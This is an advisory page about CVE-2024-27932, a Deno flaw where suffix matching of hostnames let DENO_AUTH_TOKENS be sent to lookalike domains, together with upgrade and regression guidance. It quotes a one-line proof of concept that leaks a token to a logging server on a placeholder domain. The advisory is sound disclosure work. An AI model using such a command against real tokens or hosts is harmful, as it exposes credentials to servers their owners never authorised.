Deno's improper suffix match testing for DENO_AUTH_TOKENS
CVE-2024-27932GHSA-5frw-4rwq-xhcr
What to do
Vendor fix available. Upgrade each affected package to the fixed version on its release line (deno 1.40.4), redeploy, then verify what is actually installed.
This page has no inventory attached, so it cannot say whether you are affected. A vendor fix is not proof that your deployment is fixed.

Source description
As published by the source; long descriptions are shortened.
Summary Deno improperly checks that an import specifier's hostname is equal to or a child of a token's hostname, which can cause tokens to be sent to servers they shouldn't be sent to. An auth token intended for example.com may be sent to notexample.com. Details authtokens.rs uses a simple endswith check, which matches www.deno.land to a deno.land token as intended, but also matches im-in-ur-servers-attacking-ur-deno.land to deno.land tokens. PoC - Set up a server that logs requests. RequestBin will do. For example, denovulnpoc.example.com. - Run DENOAUTHTOKENS=a1b2c3d4e5f6@left-truncated.domain deno run https://not-a-left-truncated.domain. For example, DENOAUTHTOKENS=a1b2c3d4e5f6@poc.example.com deno run https://denovulnpoc.example.com - Observe that the token intended only for the truncated domain is sent to the full domain Impact What kind of vulnerability is it? Who is impacted? Anyone who uses DENOAUTHTOKENS and imports potentially untrusted code is affected.

# Patch Next advisory brief: CVE-2024-27932 Advisory: Deno's improper suffix match testing for DENO_AUTH_TOKENS IDs: CVE-2024-27932, GHSA-5frw-4rwq-xhcr Record: https://patchnext.com/advisories/cve-2024-27932 (revision 1, source checked 26 Oct 2026, 15:38 UTC) Inventory: none attached. This brief comes from a public page and does not say whether any deployment is affected. Severity: Medium (CVSS 4.6) Exploitation: no confirmed exploitation recorded. Patch Next confirms exploitation only from CISA KEV. Vendor response: Vendor fix available; fixed versions by package: deno 1.40.4. A vendor fix does not mean a deployment is fixed. ## Affected components - crates.io deno: affected >= 1.8.0, < 1.40.4; fixed in 1.40.4 ## Suggested inspection (read-only) - crates.io deno: check the installed version with your package manager. ## Supported action Upgrade each affected component to a fixed version on its release line. For a transitive dependency, upgrade the parent package or add an override or constraint, then regenerate the lockfile. Redeploy every environment that ran an affected version. ## Required regression checks - Run the test suite and a production build. - Exercise the features that depend on deno. - Repeat the inspection and confirm that only fixed versions remain installed. ## Rollback considerations - Keep the previous lockfile and deployment artifact. Rolling back reinstates the vulnerable version, so apply any documented mitigation while you fix forward. ## Unresolved questions - Which deployments run an affected version? - Exploitation status can change. Check again before lowering the priority. - Mark the work resolved only after the fixed version is verified in production. ## Sources - Verified: https://github.com/advisories/GHSA-5frw-4rwq-xhcr (GitHub-reviewed advisory GHSA-5frw-4rwq-xhcr lists affected ranges: crates.io deno >=1.8.0 <1.40.4) Commands are suggestions: review each one before running it.
